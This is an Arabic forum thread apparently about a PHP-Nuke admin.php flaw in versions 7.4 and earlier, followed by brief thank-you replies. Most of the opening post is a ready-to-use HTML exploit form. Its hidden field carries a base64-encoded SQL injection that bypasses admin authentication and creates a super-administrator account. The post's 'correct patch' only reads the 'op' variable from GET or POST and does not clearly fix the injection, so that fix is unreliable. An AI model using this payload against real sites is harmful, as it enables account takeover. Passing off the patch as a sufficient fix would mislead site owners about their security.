ثغرة النيوك , مع سد الثغرة ...

[VIP]

ثغرة النيوك الجديده , مع الترقيع !
السلام عليكم ورحمة الله وبركاته



الثغرة في ملف : Admin.php

وهي عبارة عن استثمار .. لخطاء برمجي بالملف ,,

يمّكن المخترق من الحصول على حساب ادامن في مجلة النيوك ,,

الاصدارات المصابة : 7.4 وما تحتها من اصدارات ,

وهذا جزء من الكود الاستثماري للثغرة طبعا كود html:

كود:

NOME: 
    <input type="text" 
name="add_name"> 
    <br> 
    PASSWORD: 

    <input type="text" 
name="add_pwd"> 
    <br> 
    E-MAIL: 
    <input type="text" 
name="add_email"> 
    <br> 
    <input type="hidden" 
name="admin" 
value="eCcgVU5JT04gU0VMRUNUIDEvKjox"> 
    <br> 
    <input type="hidden" 
name="add_radminsuper" value="1"> 
    <br> 
    <input type="hidden" 
name="op" 
value="AddAuthor"> 
  </p> 
  <p> 
    <input type="submit" 
name="Submit" 
value="Create 
Admin"> 
    <br> 
  </p> 
</form>

الترقيع الصحيح :

قم باضافة هذة السطور الى ملف admin.php

كود:

if ( !empty($HTTP_GET_VARS['op']) ) 
{ 
$op = $HTTP_GET_VARS['op']; 
} 

if ( !empty($HTTP_POST_VARS['op']) ) 
{ 
$op = $HTTP_POST_VARS['op']; 
}

مع التحية اخواني اصحاب المواقع

 

 

[برق]

مشكور اخوي بصراحه معلومه مهمه لاصحاب المواقع المبتدئين

[VIP]

العفو طال عمرك

[برق]

مشكور اخوي على هل شرح الممتاز